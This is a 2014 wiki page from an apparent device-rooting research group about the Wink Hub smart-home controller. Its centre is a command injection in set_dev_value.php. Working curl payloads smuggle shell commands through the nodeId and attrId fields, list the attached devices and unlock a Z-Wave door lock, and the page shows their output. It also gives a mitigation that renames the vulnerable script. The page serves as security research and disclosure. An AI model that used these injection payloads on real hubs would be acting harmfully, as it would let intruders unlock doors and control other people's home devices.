Difference between revisions of "Wink Hub"
m (1 revision: Moving from DC22 to main site.) |
Revision as of 08:22, 17 August 2014
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
This page will be dedicated to a general overview, descriptions, and information related to the Wink Hub.
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Wink Hub at Amazon
Disassembly
UART
The pin-out for UART can be found on the image below.
set_dev_value.php Command Execution
The Wink Hub runs a web server and within the server has a script that allows for remote command execution. This php code for this script can be seen in the photo below.
As you can see the "nodeId" and "attrId" values are used in the sudo command string that is created and then used in the php "passthru()" call. This allows us to execute commands by simply posting a command as either a "nodeId" or "attrId" using any shell command formats (";;", "$()", "|", "``").
Example:
curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;COMMAND-HERE;"
Accessing Peripherals
Accessing peripherals attached to the device can be accomplished using the "/usr/sbin/aprontest" binary.
This binary is capable of listing all the attached peripherals as well as the peripheral states and state types.
For example:
curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -l;" Found 1 devices in database... MASTERID | INTERCONNECT | USERNAME 1 | ZWAVE | New SECURE_KEYPAD_DOOR_LOCK curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;" Generic/Specific device types: 0x40/0x03 Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044 Device has 1 attributes... New SECURE_KEYPAD_DOOR_LOCK ATTRIBUTE | DESCRIPTION | TYPE | MODE | GET | SET 10 | Lock_Unlock | BOOL | R/W | TRUE | TRUE
Above you can see us querying the WinkHub from the bug within the "set_dev_value" PHP script to list the attached devices. We then use the "MASTERID" in the second query to find out exactly how to communicate with the attached peripheral.
Using the same "aprontest" binary, we can then manipulate the state of the attached device.
For example:
curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -t 10 -u -v FALSE;" Update device with master ID 1, setting value FALSE Update callback: Status 0 on updating master ID: 1 curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;" Generic/Specific device types: 0x40/0x03 Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044 Device has 1 attributes... New SECURE_KEYPAD_DOOR_LOCK ATTRIBUTE | DESCRIPTION | TYPE | MODE | GET | SET 10 | Lock_Unlock | BOOL | R/W | FALSE | FALSE
The above example first sets the Lock_Unlock state to "FALSE" which unlocks the door lock. Then we query the device status again and confirm it is now "FALSE"
aprontest Syntax
Usage: aprontest [OPTION]... Send commands and list information about connected devices Operations: -a Add a new home automation device -n Manually add a home automation device to the database only. USE WITH CAUTION. Only supports zigbee at this time. -d Delete a home automation device -f Force delete a home automation device from the database only. USE WITH CAUTION. Only supports zigbee at this time. -u Update the state of a home automation device with a new value -e Force a refresh of a home automation device -g Set a generic callback for a radio for one minute of radio testing -l List general information about automation devices, or specific information about one device --set-name Set user-readable name for a device Other Options: -r <radio> Specify a radio for an Add Device or Generic Callback operation. One of lutron, zwave, zigbee, kidde -m <id> Specify a master device ID for a Delete, Update, Refresh, or List operation -t <id> Specify an attribute ID for an Update operation -v <value> Specify a new value to set for an Update operation Kidde Specific Operations: -k <ID> Set Kidde system ID Z-Wave Specific Operations: --zwave_controller_reset Reset the zwave controller. USE WITH CAUTION. Existing z-wave network will be lost. --zwave_remove_failed Remove a failed zwave device. --zwave_replace_failed Replace a failed zwave device. --zwave_learn_mode Enter Learn Mode on the Zwave Controller. --zwave_controller_shift Hand off control to another (new) Zwave controller. --zwave_exclusion_mode Enter Exclusion Mode on the Zwave Controller. Lutron Specific Operations: --lutron_pico_add <dimmerMasterId> Add dimmerMasterId to the control list for the pico controller with masterId set via -m --lutron_pico_del <dimmerMasterId> Delete dimmerMasterId from the control list for the pico controller with masterId set via -m
Fixing "set_dev_value.php" Bug
This script isn't actually used for anything and can be removed or moved. This can be done by using the original bug to remove the script for which the bug is contained.
curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;mv /var/www/set_dev_value.php /var/www/set_dev_value.php.txt;"